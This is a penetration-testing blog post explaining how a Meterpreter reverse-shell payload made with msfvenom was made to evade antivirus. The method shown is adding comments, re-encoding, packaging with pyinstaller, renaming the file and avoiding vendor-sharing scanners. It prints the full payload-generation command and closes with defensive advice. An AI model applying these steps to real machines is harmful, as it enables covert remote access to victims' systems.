When it comes to securing a system especially a windows machine, people often rely just on antivirus. Most of the people have an assumption that having an antivirus installed will be enough to protect their machines from malicious programs and cybercriminals. It is true that antivirus programs are getting smart every day and antivirus vendors are working very hard to improve detection rates and reduce false positives. The same applies to the cybercriminals; every day the internet is getting flooded with plenty of tutorials that explain how to evade the antivirus programs. Some methods include advanced techniques like changing the behavior of the payloads and encrypting them, while some techniques require just running some simple tools. Let us explore one of the simplest methods that can bypass popular antiviruses like MacAfee, Kaspersky etc.
A couple of months back we conducted a penetration testing activity on a windows machine. The machine was running Windows 10 and was hosted on Citrix environment. For starters, we were provided with a least privilege user account. After doing some reconnaissance and exploring a couple of options, we zeroed in on sending a payload to the target machine, which gives us the Meterpreter session. This Meterpreter session will make our job easier for post exploitation. However, to achieve this we need to ensure that our payload doesn’t get detected by antivirus. Owing to some stringent time constraint, we placed our bets on a simple workaround, which allowed us to bypass the antivirus within a matter of minutes.
We quickly popped up our Linux terminal and opened msfvenom (msfvenom is the payload generator and encoder developed by the awesome folks at Offensive Security; the same people who created the kali Linux) and created a simple python payload using the following command:
msfvenom -p python/meterpreter/reverse_tcp LHOST=<target Ip> LPORT=<TargetPort> R> name_of_the_payload.py
HERE -P WILL SPECIFY THE PAYLOAD TYPE AND LHOST IS MY ATTACKING MACHINE AND LPORT IS PORT ON MY MACHINE
Now, Let’s see the source code of this payload
As we can see it’s base 64 encoded, so we decoded it to get the below code snippet:
This is a straightforward code, so any antivirus (including the windows defender ;-)) will detect it. So let us try to modify the code so that its signature would be unique such that it can be greenlit by the scan. All we need to do is to just insert some comments in the python Code as illustrated below.
After inserting comments, encode the code to base64 again.
Now using py2exe or pyinstaller we can create an executable to the payload by using below command
What this command does is, it will create a single file, which contains all the required runtimes. The payload will be saved in /root/dist/ path.
Now rename the file to something else, which looks like a normal file. We renamed it as “niceprogram” in our case.
Now let us upload it to some online scanner to test whether any antiviruses are able to detect our malicious payload or not. Usually, we use no distribute.com to do this job, as they do not share their scan results. For this test, we scanned our payload with virustotal.com
Note: Please don’t use virustotal.com to test your payloads as they share the results with antivirus vendors, your payload signature will be stored and in future, it will get detected by any antivirus (remember that’s why we are changing the signature of the file ;-))
Now it is time to get the result…
As you can see the simple generic malware we generated now (almost) successfully bypassed and flagged as clean by almost all antivirus. For demo purpose the payload was intentionally made to fail at least one scan, otherwise, we can make it 100 % undetectable by any antivirus by inserting more comments in our original payload.
As I already mentioned earlier, there are many advanced techniques to do this, which work very effectively in real-world scenario. All we need is enough time and resources.
• If you are system owner, consider hardening the system and configure the IDS/IPS or any other protection mechanism properly. Create awareness in users because like they say “Your security is as strong as the weakest link and the weakest link in the security chain is humans“.
• If you are Pentester, there are many other simple ways to create undetectable backdoor payloads. Utilize them and concentrate more on post exploitation. Remember, the true challenge comes in post-exploitation.
• If you are a user, think twice before clicking on unknown links and files. Never depend on antivirus because they can be easily bypassed as we illustrated above.
Authored By - Surya Prasanth
TCS Cyber Security Practice